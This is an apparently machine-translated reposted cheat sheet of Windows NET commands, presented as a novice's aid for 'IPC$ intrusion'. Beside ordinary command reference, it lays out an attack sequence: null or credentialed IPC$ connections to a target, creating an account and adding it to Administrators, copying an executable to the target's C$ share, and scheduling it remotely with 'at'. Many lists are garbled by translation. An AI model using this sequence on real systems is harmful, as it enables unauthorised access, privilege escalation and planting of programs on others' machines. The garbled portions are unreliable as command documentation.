IPC Channel intrusion related command finishing _dos/bat

Source: Internet
Author: User
Tags net time sessions net send
Take advantage of ipc$ intrusion related commands:
We will inevitably encounter the time of the invasion to forget the order, now I know some of the commands summed up to provide you. These commands can solve a large part of the Novice's problem.
00:net use
Role: Connect the computer or disconnect the computer from the shared resource, or display the connection information for the computer.
Command format:
NET USE [devicename | *] [\\\\computername\\sharename[\\volume]] [password | *]] [/user:[domainname\\]username] [/ Delete] | [/persistent:{yes | no}]]
Parameter introduction:
(1) Type net use with no parameters to list network connections.
(2) devicename Specifies the name of the resource to which you want to connect or the name of the device to disconnect.
(3) \\\\computername\\sharename the name of the server and the shared resource.
(4) Password access to the shared resource's password.
(5) * Prompts to type the password.
(6)/user Specifies a different user to connect to.
(7) domainname specifies another domain.
(8) Username Specifies the user name for the login.
(9)/home connects users to their host directory.
(/delete) To cancel the designation of a network connection.
(one)/persistent controls the use of permanent network connections.
01:net use \\\\x.x.x.x\\ipc$ \ "\"/user:\ "\" to establish an empty connection
02:net use \\\\x.x.x.x\\ipc$ \ "password \"/user:\ "user name \" To establish a non-empty connection
03:net use \\\\x.x.x.x\\ipc$/del Delete connection
04:net Time \\\\x.x.x.x
Function: Synchronize the computer's clock with the time of another computer or domain.
Command format: NET time [\\\\computername |/domain[:name]] [/set]
Parameter introduction:
(1) \\\\computername the name of the server to be checked or synchronized.
(2)/domain[:name] Specifies the domain to be synchronized with its time.
(3)/set makes this computer clock synchronized with the specified computer or domain clock.
05:net View \\\\x.x.x.x
Role: Displays a list of domains, lists of computers, or shared resources for a specified computer.
Command format: NET view [\\\\computername |/domain[:d Omainname]]
Parameter introduction:
(1) Type a net view with no parameters to display a list of computers in the current domain.
(2) \\\\computername specifies the computer for which you want to view shared resources.
(3)/domain[:d Omainname] Specifies the domain for which you want to view the available computers.
06:net use X: \\\\x.x.x.x\\y map shared resources with share name Y to local X disk
07:net use x:/del Delete a mapped X disk
08:net Share
Function: Create, delete, or display shared resources.
Command format: NET share share Name=drive:path [/users:number |/unlimited] [/remark:\ "text\"]
Parameters: (1) Type a net share with no parameters to display information about all the shared resources on the local computer. (2) ShareName is the network name of the shared resource.
(3) Drive:path Specifies the absolute path of the shared directory.
(4)/users:number sets the maximum number of users who can access a shared resource at the same time.
(5)/unlimited does not limit the number of users who concurrently access shared resources.
(6)/remark:\ "text \" To add a comment about the resource, and the comment text is enclosed in quotation marks.
09:net User
Role: Add or change user accounts or display user account information.
This command can also be written as net users
Command format: NET user [username [password | *] [options]] [/domain]
Parameters: (1) Type net user without parameters to view a list of user accounts on the computer.
(2) Username Add, delete, change, or view the user account name.
(3) Password assigns or changes the password to the user account number.
(4) * Prompt to enter the password.
(5)/domain performs operations on the primary domain controller of the computer's primary domain.
10:net start function: Start the service, or display a list of started services.
11:net pause function: Suspend a running service.
12:net Continue function: Reactivate a suspended service.
13:net stop
Function: Stop Windows NT Network Service.
Command format: net stop service
Parameter introduction:
(1) Alerter (alarm)
(2) Client Service for NetWare (NetWare Client Services)
(3) ClipBook server (ClipBook servers)
(4) Computer Browser (Computer browser)
(5) Directory Replicator (Directory replicator)
(6) FTP Publishing Service (FTP) (FTP distribution services)
(7) Lpdsvc
(8) Net Logon (network logon)
(9) Network DDE (Network DDE)
(Ten) Network dde dsdm (Network dde DSDM)
(one) Network Monitor Agent (Network monitoring agent)
() NT LM security Support provider (NT LM secure support provided)
(() OLE (Object linking and Embedding)
(km) remote access Connection Manager (Remote Access Connection Manager)
(ISNSAP) Remote Access Service (ISNSAP services)
Remote access server (remotely accessible)
(a) Remote procedure call (RPC) locator (remote procedure invoke locator)
(a) Remote procedure call (RPC) service (Remote Procedure invocation Services)
(a) schedule (dispatch)
(server)
Easy TCP/IP services (Simple TCP/IP service)
() SNMP
(spooler) (print spooler)
(a) TCP/IP NetBIOS Helper (TCP/IP NetBIOS AIDS)
() Ups
(num) Workstation (workstation)
(a) Messenger (Messenger)
(a) DHCP client
(eventlog)
14:net Statistics
Function: Displays statistics for the local workstation or Server service.
Command format: NET statistics [workstation | server]
Description of the parameters: (1) Type a net statistics with no parameters to list the running services whose statistics are available.
(2) Workstation displays statistics about the local Workstation service.
(3) Server displays statistics about the local server service.
Example: NET statistics Server | More displays statistics about the Server service.
15:net session (equivalent to net sessions or net Sess)
Function: Lists or disconnects the session of the local computer and the client with which it is connected.
Command format: NET session [\\\\computername] [/delete]
Description of the parameters: (1) Type the net session without parameters to display all information about the sessions with the local computer.
(2) \\\\computername identifies the computer on which you want to list or disconnect the session.
For example: NET session \\\\cnse8 to display a list of client sessions information named Cnse8.

15:net user account name password/add add account number and password
16:net user account name/active:yes activation account
17:net localgroup Administrators account name/add Add this account to the local admin group
18:net Send
Role: Send messages to other users, computers, or communication names on the network.
Command format: NET send {name | * |/domain[:name] |/users} message
Parameter description: (1) name to receive the user name, computer name, or communication name to which the message is sent.
(2) * Send the message to all the names in the group.
(3)/domain[:name] sends a message to all the names in the computer domain.
(4)/users sends messages to all users who are connected to the server.
(5) The text sent as a message.
Example: (1) Net Send/users Welcome to cnse8.com displays \ Welcome to cnse8.com\ for all users connecting to the computer
19:net Config
Role: Displays the currently running configurable service, or displays and changes the settings for a service.
Command format: NET config [service [options]]
Parameter introduction:
(1) Type a net config with no parameters to display a list of configurable services.
(2) Services configured through the Net CONFIG command (server or workstation).
(3) Specific options for the options service.
20:net Accounts
Role: Update user account Database, change password and login requirements for all accounts.
Command format: NET accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/ Uniquepw:number] [/domain]
Parameter introduction:
(1) Type a net accounts with no parameters to display current password settings, logon time limits, and domain information.
(2)/forcelogoff:{minutes | no} set when the user account or valid logon time expires.
(3)/minpwlen:length set the minimum number of characters for the user account password.
(4)/maxpwage:{days | unlimited} set the maximum number of days a user account password is valid.
(5)/minpwage:days set the minimum number of days the user must keep the original password.
(6)/uniquepw:number requires a user to change the password, the same password must be reused after number times.
(7)/domain performs the operation on the primary domain controller of the current domain.
(8)/sync when used with the primary domain controller, this command synchronizes all the backup domain controllers in the domain.
For example: NET Accounts/minpwlen:7 sets the minimum number of characters for a user account password to 7.
21:copy path \ file name \\IP\\ shared directory name
Example: Copy c:\\cnse8.exe \\\\x.x.x.x\\c$ will copy the Cnse8.exe file under C disk to the other party C.
Copy \\\\x.x.x.x\\c$\\cnse8.exe c:\\ The file cnse8.exe on the remote machine to its own
On the machine.
22:at the \\\\IP time program name to add a schedule remotely.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.